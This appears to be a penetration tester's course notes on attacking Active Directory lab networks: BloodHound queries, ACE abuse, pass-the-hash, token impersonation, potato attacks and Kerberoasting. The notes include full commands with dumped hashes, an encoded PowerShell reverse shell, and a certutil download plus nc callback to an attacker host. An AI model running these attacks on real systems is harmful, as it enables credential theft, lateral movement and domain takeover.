- `-approx` Approximately equal to
- `-bor` Bitwise OR
- `-band` Bitwise AND
- `-recursivematch` Recursive match
- `-like` Like
- `-notlike` Not like
- `-and` Boolean AND
- `-or` Boolean OR
- `-not` Boolean NOT
- Example
```
Get-ADUser -Filter "name -eq 'jane doe'"
Get-ADUser -Filter {name -eq 'jane doe'}
Get-ADUser -Filter'name -eq "jane doe"'
```
## Basic LDAP Filters
- `&` and
- `|` or
- `!` not
## Example of useful queries
- `Get-ADGroup -Identity " *[Source: ACTIVE DIRECTORY BLOODHOUND on HTB Academy](https://academy.hackthebox.com/course/preview/active-directory-bloodhound)*
## Cypher Query Language for custom queries
> *[Source: ACTIVE DIRECTORY BLOODHOUND on HTB Academy](https://academy.hackthebox.com/course/preview/active-directory-bloodhound)*
### Structure of query
- `MATCH (A)-[B]->(C) RETURN A,B,C` Here A and C are nodes B is the relationship between A and C
- `MATCH (n:User),(m:Group) MATCH p=(n)-[r:MemberOf*1..3]->(m) RETURN p`
### Most common Keywords
- `MATCH` Used before describing the search pattern for finding one or more nodes or relationships.
- `WHERE` Used to add more constraints to specific patterns or filter out unwanted patterns.
- `RETURN` Used to specify the results format and organizes the resulting data. Results can be returned with specific properties, lists, ordering, etc.
- `CREATE` and `DELETE` - Used to create and delete nodes/relationships
- `SET` and `REMOVE` - Used to set values to properties and add labels to nodes
- `MERGE` - Used to create nodes uniquely without any duplicates.
### Example of query
- `MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p` Find the members of all groups deemed to be "high-value targets."
- `MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS 'SQL')RETURN u` Find users with a keyword in their Service Principal Name (SPN)
- `MATCH (u:User {dontreqpreauth: true}) RETURN u` Find users who do not require Kerberos pre-authentication
- `MATCH (u:User) WHERE u.description IS NOT NULL RETURN u.name,u.description` Find all users with a description field that is not blank
### Edge relationships in Bloodhound
- MemberOf One node (user, group, or computer) is a member of a second node (group)
- AdminTo One node (user, group, or computer) has local admin rights on a second node (computer)
- HasSession One node (user) has a session on a second node (computer)
- TrustedBy One node (domain) is trusted by a second node (domain)
## Exploiting ACEs
A significant amount of ACEs can be misconfigured, and the exploits for each vary. The Bloodhound documentation assists in explaining enumerated ACEs and how they can be exploited.
- **ForceChangePassword**: We have the ability to set the user's current password without knowing their current password.
- **AddMembers**: We have the ability to add users (including our own account), groups or computers to the target group.
- **GenericAll**: We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.
- **GenericWrite**: We can update any non-protected parameters of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.
- **WriteOwner**: We have the ability to update the owner of the target object. We could make ourselves the owner, allowing us to gain additional permissions over the object.
- **WriteDACL**: We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.
- **AllExtendedRights**: We have the ability to perform any action associated with extended AD rights against the target object. This includes, for example, the ability to force change a user's password.
In order to exploit these ACEs, we will need a method to interact with AD to make these requests. The two best options for this are the AD-RSAT PowerShell cmdlets or PowerSploit.
Depending on the breach and the detection tools in the environment, one option may be stealthier.
> *Source: [Tryhackme](https://tryhackme.com/room/exploitingad)*
### Examples
- `AddMembers` To exploit this we just need to add our user to the desired group using powershell `Add-ADGroupMember "IT Support" -Members "barbara.reid"`
- Checked that it worked `Get-ADGroupMember -Identity "IT Support"`
- `ForceChangePassword` Identify a member of the group we want to change the password for taking over their account `Get-ADGroupMember -Identity "Tier 2 Admins"`
- And then we can change the password. *Note: It can take up to 10 minutes to be effective. We also might need to disconnect and reconnect*.
```dos
$Password = ConvertTo-SecureString "Newpassword1234!" -AsPlainText -Force
Set-ADAccountPassword -Identity "t2_melanie.davies" -Reset -NewPassword $Password
```
## Other Tips Bloodhound
- If we click on a blade in the graph and select help we will have useful info about the specific blade selected. It is really worth having a look at the help and abuse info to have more info and tips on ways of exploitation.
## Bloodhound - Resources
- [Bloodhound - Lisandre](https://lisandre.com/archives/2186)
- [Bloodhound: A Pentester’s best friend by Warren Butterworth](https://medium.com/@warrenbutterworth/bloodhound-a-pentesters-best-friend-d8467aa6c50)
- [Cypher Query Language](https://neo4j.com/developer/cypher/)
- [Edges in Bloodhound](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html)
- [SharpHound: Target Selection and API Usage - CptJesus](https://blog.cptjesus.com/posts/sharphoundtargeting)
- [Exploiting AD - Tryhackme](https://tryhackme.com/room/exploitingad)
- [BloodHound – Sniffing Out the Path Through Windows Domains - Michiel Lemmens](https://www.sans.org/blog/bloodhound-sniffing-out-path-through-windows-domains/)
- [THE DOG WHISPERER'S HANDBOOK 3 - SadProcessor](https://ernw.de/download/ERNW_DogWhisperer3.pdf)
# Post Compromise Enumeration - Resources
- https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#list-of-property-flags
- https://github.com/awsmhacks/awsmBloodhoundCustomQueries
- https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json
- https://github.com/hausec/Bloodhound-Custom-Queries
- https://academy.hackthebox.com/course/preview/active-directory-bloodhound
- https://sansorg.egnyte.com/dl/zscX9KYH5M
- https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers
- https://ernw.de/download/BloodHoundWorkshop/ERNW_DogWhispererHandbook.pdf
# Post-Compromise Attacks
## Pass the password
### CrackMapExec
- Install: `sudo apt install crackmapexec`
- Pass the password on the domain: `crackmapexec smb 10.0.2.0/24 -u fcastle -d DOMAIN.local -p Password1` If the password is the same for another machine in the network we will get ownership on this new machine too
```
┌──(root💀kali)-[~kali]
└─# crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password1
SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 10.0.2.5 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1
SMB 10.0.2.4 445 THEDEFENDER [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB 10.0.2.15 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
```
- We can also add --sam to the previous command to dump the sam file here we got 5 sam hashes
```bash
┌──(root💀kali)-[~kali]
└─# crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password1 --sam
SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB 10.0.2.15 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB 10.0.2.5 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1
SMB 10.0.2.4 445 THEDEFENDER [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB 10.0.2.15 445 THEPUNISHER [+] Dumping SAM hashes
SMB 10.0.2.4 445 THEDEFENDER [+] Dumping SAM hashes
SMB 10.0.2.15 445 THEPUNISHER Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.4 445 THEDEFENDER Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.15 445 THEPUNISHER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.4 445 THEDEFENDER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.15 445 THEPUNISHER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.4 445 THEDEFENDER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.0.2.15 445 THEPUNISHER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
SMB 10.0.2.15 445 THEPUNISHER Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 10.0.2.15 445 THEPUNISHER [+] Added 5 SAM hashes to the database
SMB 10.0.2.4 445 THEDEFENDER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:25e61d7e5702c678e3be8711c03b7837:::
SMB 10.0.2.4 445 THEDEFENDER Jessica Jones:1001:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
SMB 10.0.2.4 445 THEDEFENDER [+] Added 5 SAM hashes to the database
```
#### Troubleshot crackmapexec
- If you get this error `configparser.NoSectionError: No section: 'BloodHound'`
- You need to run `locate cme.conf`
- Once you find it you can add these lines or just set bh_enabled to False if all the lines are already here.
```bash
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
```
### psexec
We can also use psexec to try to get a shell on the other machine
```bash
┌──(root💀kali)-[~kali]
└─# psexec.py marvel/fcastle:Password1@10.0.2.4
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.0.2.4.....
[*] Found writable share ADMIN$
[*] Uploading file IEoFnNEZ.exe
[*] Opening SVCManager on 10.0.2.4.....
[*] Creating service YXVX on 10.0.2.4.....
[*] Starting service YXVX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
THEDEFENDER
```
## Pass the Hash
- Methodology
- Here is what we can do after dumping the hashes:
- Crack them with hashcat
- Use them with tools like: smbclient or pth-smbclient, psexec, wmiexec or pth-wmic, rpcdump or pth-rpcclient, ...
- See [here](https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/) for detailed explainations on how to use the mentioned tools
### Impacket - Secretsdump.py
- We can dump hashes from our compromised machines in the network
```bash
┌──(root💀kali)-[~kali]
└─# secretsdump.py marvel/fcastle:Password1@10.0.2.15
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfafe40d7e147c04806fe29ef03e04386
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[STRIPPED]
```
## Crack NTLM hashes
### Hashcat
```bash
┌──(root💀kali)-[~kali]
└─# hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
[STRIPPED]
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
64f12cddaa88057e06a81b54e73b949b:Password1
31d6cfe0d16ae931b73c59d7e0c089c0:
c39f2beb3d2ec06a62cb887fb391dee0:Password2
[STRIPPED]
```
## Pass the Hash Attack
> *Note: ntlmv1 can be passed but ntlmv2 can not.*
### NetExec (formerly known as Crackmapexec)
> Now that Crackmapexec is not supported anymore the same commands should work with NetExec
To pass the hash in the following line we will only need the last part after the last semicolon (only the NTHash):
Here is the structure of the hash: `User Name:ID:LMHASH:NTHASH:::`
With this: `Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::`
We will use this: `64f12cddaa88057e06a81b54e73b949b`
We will then use this command:
```bash
crackmapexec smb 10.0.2.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth
```
We would get something like this:
```bash
SMB 10.0.2.15 445 THEPUNISHER [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB 10.0.2.5 445 HYDRA-DC [*] Windows 10.0 Build 17763 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB 10.0.2.4 445 THEDEFENDER [*] Windows 10.0 Build 19041 x64 (name:THEDEFENDER) (domain:THEDEFENDER) (signing:False) (SMBv1:False)
SMB 10.0.2.15 445 THEPUNISHER [+] THEPUNISHER\Frank Castle 64f12cddaa88057e06a81b54e73b949b
SMB 10.0.2.5 445 HYDRA-DC [-] HYDRA-DC\Frank Castle:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
SMB 10.0.2.4 445 THEDEFENDER [-] THEDEFENDER\Frank Castle:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE
```
```bash
# Another example with another user
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
# Command executions
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
```
### PSexec
We can use the same attack with psexec to get a shell except we will be using the full hash
For this `Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::`
We will use this: `aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b`
```bash
┌──(root💀kali)-[~kali]
└─# psexec.py marvel/fcastle@10.0.2.15 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.0.2.15.....
[*] Found writable share ADMIN$
[*] Uploading file fQsiaobC.exe
[*] Opening SVCManager on 10.0.2.15.....
[*] Creating service OnEf on 10.0.2.15.....
[*] Starting service OnEf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```
### pth winexe
- `pth-winexe -U 'admin%hash' //10.10.67.135 cmd.exe`
### Mimikatz on Windows
- `mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit`
- `/user` - The user name we want to impersonate.
- `/rc4` or `/NTLM` - NTLM hash of the user's password.
- `/domain` - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
- `/run` - The program we want to run with the user's context (if not specified, it will launch cmd.exe).
### PowerShell Invoke-TheHash on Windows
- [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
When using Invoke-TheHash, we have two options: SMB or WMI command execution. To use this tool, we need to specify the following parameters to execute commands in the target computer:
- Target - Hostname or IP address of the target.
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
- Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.
```powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```
#### Getting a reverse shell
To create a simple reverse shell using PowerShell, we can use [revshells](https://www.revshells.com/), set our IP 172.16.1.5 and port 8001, and select the option PowerShell #3 (Base64).
```powershell
# Set a listener
.\nc.exe -lvnp 8001
# Invoke-TheHash with WMI
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAzACIALAA4ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
```
## With evil-winrm in Linux
> If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.
- `evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453`
## Pass the hash with rdp in Linux
- Restricted Admin Mode, which is disabled by default, should be enabled on the target host
- This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:
`reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f`
- `xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B`
- When the registry key `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy` is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.
## Resources
- https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
- https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167
# Token Impersonation - Potato attacks
## What is it
- Token are temp keys that give access to a system or network without credentials.
## How to
- Launch Metasploit `msfconsole`
- Choose the exploit: `use exploit/windows/smb/psexec`
- Set: rhosts, smbdomain, smbpass, smbuser, target (we can use `show targets` to have a list), payload
- Launch the attack: `run`
- We get a shell:
```
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.0.2.8:4444
[*] 10.0.2.15:445 - Connecting to the server...
[*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'...
[!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe
[*] 10.0.2.15:445 - Created \oeyrkyrs.exe...
[*] Sending stage (200262 bytes) to 10.0.2.15
[+] 10.0.2.15:445 - Service started successfully...
[*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe...
[*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500
meterpreter >
```
- Getting hashes: `hashdump`
```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
```
- Use tools: `load` (double tab to get the list of tools)
- `load incognito`
```
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
```
- list_tokens -u
```
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
MARVEL\Administrator
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2
Impersonation Tokens Available
========================================
No tokens available
```
- Impersonate Administrator:
```
meterpreter > impersonate_token marvel\\administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > shell
Process 8576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
marvel\administrator
```
- If we hashdump again it will not work so we can rev2self to get back to the initial user
- Any user that has logged in the target will have a token there until the target reboots
## Potato Attacks
- These attacks requires the `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` to be enabled on the machine.
### Hot potato
- We can use [Tater](https://github.com/Kevin-Robertson/Tater)
- `powershell.exe -nop -ep bypass`
- `Import-Module .\Tater.ps1`
- `Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"`
- Your user should be in the administrators group `net localgroup administrators` to check
### Juicy potato
#### Enumeration after initial shell with MSSQL
- Say we have a shell on an mssql instance `mssqlclient.py sql_dev@IP-ADD -windows-auth`
- We can enable command shell using `enable_xp_cmdshell`
- And then we will be able to type every command we need this way: `xp_cmdshell whoami /priv`
- For juicy potato we need to check if we have `SeImpersonatePrivilege` enabled
- We do!
#### Exploitation
- Let's get JuicyPotato binary in our attacking machine `wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe`
- Let's serve the file to our target using python http server `python3 -m http.server 80`
- Let's take it in our shell using certutil `xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe`
- Let's get an admin shell `xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t *` where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.
- And we should have an authority system shell
## Resources
- https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
- https://github.com/ohpe/juicy-potato
- https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners
# Kerberos
> Made from my notes on tryhackme and Hackthebox Academy
## Kerberos authentication
The user makes an AS-REQ to the Key Distribution Centre (KDC) on the DC that includes a timestamp encrypted with the user's NTLM hash. Essentially, this is the request for a Ticket Granting Ticket (TGT). The DC checks the information and sends the TGT to the user. This TGT is signed with the KRBTGT account's password hash that is only stored on the DC. The user can now send this TGT to the DC to request a Ticket Granting Service (TGS) for the resource that the user wants to access. If the TGT checks out, the DC responds to the TGS that is encrypted with the NTLM hash of the service that the user is requesting access for. The user then presents this TGS to the service for access, which can verify the TGS since it knows its own hash and can grant the user access.
> *Source: [TryHackMe - Persisting AD](https://tryhackme.com/room/persistingad)*
The Kerberos authentication system is ticket-based. The central idea behind Kerberos is not to give an account password to every service you use. Instead, Kerberos keeps all tickets on your local system and presents each service only the specific ticket for that service, preventing a ticket from being used for another purpose.
- The TGT - Ticket Granting Ticket is the first ticket obtained on a Kerberos system. The TGT permits the client to obtain additional Kerberos tickets or TGS.
- The TGS - Ticket Granting Service is requested by users who want to use a service. These tickets allow services to verify the user's identity.
> Source: HTB Academy
## Kerberoasting
- Any valid user gets a ticket with kerberos to access a service (SQL for instance)
- Tool: GetUsersSPNS.py - Impacket
- Get a hash using the tool
```bash
┌──(root💀kali)-[~kali]
└─# GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 10.0.2.5 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------------------------- ---------- ----------------------------------------------------------- ------------------- ---------
HYDRA-DC/SQLService.MARVEL.local:60111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local 2022-01-28 17:55:04
$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$eb60bb[STRIPPED]7e35f1a787901409e16bc
```
- If we get this error `[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)` we need to coordinate our time with the server time using ntpdate
- `sudo apt install ntpdate`
- `sudo ntpdate 10.10.10.100`
```bash
5 Mar 19:42:53 ntpdate[19369]: step time server 10.10.10.100 offset +426.954203 sec
```
- And then you should be able to rerun and actually get the hash
- Finding the proper module in hashcat `hashcat --help | grep Kerberos`
```
┌──(root💀kali)-[~/active-directory]
└─# hashcat --help | grep Kerberos
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols
18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocols
```
- We need TGS which is 13100
- Crack the hash with hachcat (for it to work I needed to have 4gb on my vm)
```bash
┌──(root💀kali)-[~/active-directory]
└─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O filename
```bash
- Crack the hash with john
- Alternatively we can use john
```bash
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt kerbhash.txt
```
- We get the password
```bash
$krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111*$eb6[STRIPPED]6bc:MYpassword123#
```
- After getting a password, we could connect to an smbshare or get a shell
```python
python3 wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
```
or
```bash
smbclient \\\\10.10.10.100\\Users -U active.htb\\Administrator
```
## Exploiting Kerberos Delegation
The practical use of Kerberos Delegation is to enable an application to access resources hosted on a different server. An example of this would be a web server that needs to access a SQL database hosted on the database server for the web application that it is hosting. Without delegation, we would probably use an AD service account and provide it with direct access to the database. When requests are made on the web application, the service account would be used to authenticate to the database and recover information.
However, we can allow this service account to be delegated to the SQL server service. Once a user logs into our web application, the service account will request access to the database on behalf of that user. This means that the user would only be able to access data in the database that they have the relevant permissions for without having to provide any database privileges or permissions to the service account itself.
> *Source: [TryHackMe](https://tryhackme.com/room/exploitingad)*
### Example
- Enerumerate available delegations with a privileged user
- `Import-Module C:\Tools\PowerView.ps1`
- `Get-NetUser -TrustedToAuth`
- Dump LSASecrets with [Mimikatz](https://github.com/gentilkiwi/mimikatz/security)
- `mimikatz.exe`
- `token::elevate` To dump the secrets from the registry hive, we need to impersonate the SYSTEM user.
- `lsadump::secrets` Mimikatz interacts with the registry hive to pull the clear text credentials.
